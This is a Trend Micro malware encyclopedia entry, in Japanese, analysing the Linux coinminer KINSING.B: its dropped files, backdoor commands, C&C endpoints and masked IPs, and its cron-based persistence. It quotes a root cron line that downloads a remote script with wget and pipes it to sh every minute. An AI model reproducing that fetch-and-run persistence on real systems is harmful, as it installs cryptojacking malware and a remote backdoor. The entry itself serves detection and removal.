Trend Micro Security

Coinminer.Linux.KINSING.B

2020年5月15日
 解析者: Joshua Paul Ignacio   

 別名:

Trojan.Linux.Agent (IKARUS); ELF/Agent.HN!tr (FORTINET)

 プラットフォーム:

Linux/Unix

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:


  • マルウェアタイプ: 仮想通貨発掘ツール(コインマイナー)
  • 破壊活動の有無: なし
  • 暗号化:  
  • 感染報告の有無: はい

  概要

感染経路 他のマルウェアからの作成, インターネットからのダウンロード

コインマイナーは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

コインマイナーは、不正リモートユーザからのコマンドを実行し、感染コンピュータを改ざんします。

コインマイナーは、特定のWebサイトにアクセスし、情報を送受信します。 概要:プログラムは、コンピュータのCPUおよびGPUのリソースを利用して仮想通貨を発掘します。


  詳細

ファイルサイズ 16,695,296 bytes
タイプ ELF
メモリ常駐 はい
発見日 2020年5月15日
ペイロード プロセスの強制終了, URLまたはIPアドレスに接続

侵入方法

コインマイナーは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

コインマイナーは、以下のファイルを作成し実行します。

  • /tmp/salt-minions
  • One of the following:
    • /usr/bin/salt-store
    • /tmp/salt-store
    • /var/tmp/salt-store
  • /tmp/.ICEd-unix/VpJHY

コインマイナーは、以下のフォルダを作成します。

  • /tmp/.ICEd-unix

バックドア活動

コインマイナーは、不正リモートユーザからの以下のコマンドを実行します。

  • Downloads and executes a file
  • Reverse shell
  • Command Execution
  • Command Execution with outputs returned
  • Download and install updates of itself

プロセスの終了

コインマイナーは、感染コンピュータ上で以下のプロセスが常駐されていることを確認した場合、そのプロセスを終了します。

  • salt-minions

その他

コインマイナーは、以下のWebサイトにアクセスし、情報を送受信します。

  • {BLOCKED}.{BLOCKED}.129.111
  • {BLOCKED}.{BLOCKED}.88.186
  • {BLOCKED}.{BLOCKED}.200.161
  • {BLOCKED}.{BLOCKED}.44.216
  • {BLOCKED}.{BLOCKED}.87.231

コインマイナーは、以下を実行します。

  • It reads the following system info:
    • Product Name
    • Product Version
    • Product Serial
    • Product UUID
    • Board Vendor
    • Board Name
    • Board Version
    • Board Serial
    • Board Asset Tag
    • Chassis Vendor
    • Chassis Type
    • Chassis Version
    • Chassis Serial
    • Chassis Asset Tag
    • Bios Vendor
    • Bios Version
    • Bios Date
    • Sys Vendor
    • Kernel Version

  • Reads the following information from /sys:
    • /sys/devices/system/cpu/possible
    • /sys/fs/cgroup/cpuset//cpuset.cpus
    • /sys/fs/cgroup/cpuset//cpuset/mems
    • /sys/devices/system/cpu/online
    • /sys/bus/cpu/devices/cpu{0-4}/topology/package_cpus
    • /sys/bus/cpu/devices/cpu{0-4}/topology/core_cpus
    • /sys/bus/cpu/devices/cpu{0-4}/topology/thread_siblings
    • /sys/bus/node/devices/node{0-4}/cpumap
    • /sys/bus/cpu/devices
    • /sys/bus/cpu/devices/cpu{0-4}/topology
    • /sys/bus/cpu/devices/cpu{0-4}/topology/core_siblings
    • /sys/bus/cpu/devices/cpu{0-4}/online
    • /sys/bus/cpu/devices/cpu{0-4}/topology/physical_package_id
    • /sys/bus/cpu/devices/cpu{0-4}/topology/die_cpu
    • /sys/bus/cpu/devices/cpu{0-4}/topology/core_id
    • /sys/bus/cpu/devices/cpu{0-4}/topology/book_siblings
    • /sys/bus/cpu/devices/cpu{0-4}/cache/Index{0-4}/level
    • /sys/bus/cpu/devices/cpu{0-4}/cache/Index{0-4}/size
    • /sys/bus/cpu/devices/cpu{0-4}/cache/Index{0-4}/coherency_line_size
    • /sys/bus/cpu/devices/cpu{0-4}/cache/Index{0-4}/number_of_sets
    • /sys/bus/cpu/devices/cpu{0-4}/cache/Index{0-4}/physical_line_partition
    • /sys/bus/cpu/devices/cpu{0-4}/cache/Index{0-4}/shared_cpu_map
    • /sys/bus/cpu/devices/cpu{0-4}/cache/Index{0-4}/type
    • /sys/kernel/mm/hugepages
    • /sys/bus/node/devices
    • /sys/bus/node/devices/node{0-4}/hugepages

  • Reads the following information from /proc:
    • /proc/cpuinfo
    • /proc/self/cgroup
    • /proc/mounts
    • /proc/meminfo
  • It creates the following cron jobs for persistence:
    • Path: /var/spool/cron/crontabs/root
      • Schedule: Every Minute
      • Command: * * * * * wget -q -O - http://{BLOCKED}.{BLOCKED}.117.137/c.sh | sh > /dev/null 2>&1
    • Path: /var/spool/cron/crontabs/root
      • Schedule: Every Minute
      • Command: * * * * * /usr/bin/salt-store || /tmp/salt-store || /var/tmp/salt-store
  • Deletes the following cron jobs with the following strings:
    • "update.sh"
    • "logo4"
    • "logo9"
    • "logo0"
    • "logo"
    • "tor2web"
    • "jpg"
    • "png"
    • "tmp"
    • "zmreplchkr"
    • "aliyun.one"
    • "3.215.110.66.one"
    • "pastebin"
    • "onion"
    • "lsd.systemten.org"
    • "shuf"
    • "ash"
    • "mr.sh"
    • "185.181.10.234"
    • "localhost.xyz"
  • It sends the following HTTP request to the C&C Server:
    • GET /h
      • Checks for the connectivity on the C&C server
    • GET /get
      • Fetch the next task/command from the C&C server (404 Not Found means there is no ongoing task/command)
    • POST /o
      • Sends Exec output to the C&C server

詳細:プログラムは、コンピュータのCPUおよびGPUのリソースを利用して仮想通貨を発掘します。その結果、感染コンピュータの動作が非常に遅くなります。


  対応方法

対応検索エンジン: 9.850
初回 VSAPI パターンバージョン 15.870.05
初回 VSAPI パターンリリース日 2020年5月15日
VSAPI OPR パターンバージョン 15.871.00
VSAPI OPR パターンリリース日 2020年5月16日

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Coinminer.Linux.KINSING.B」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください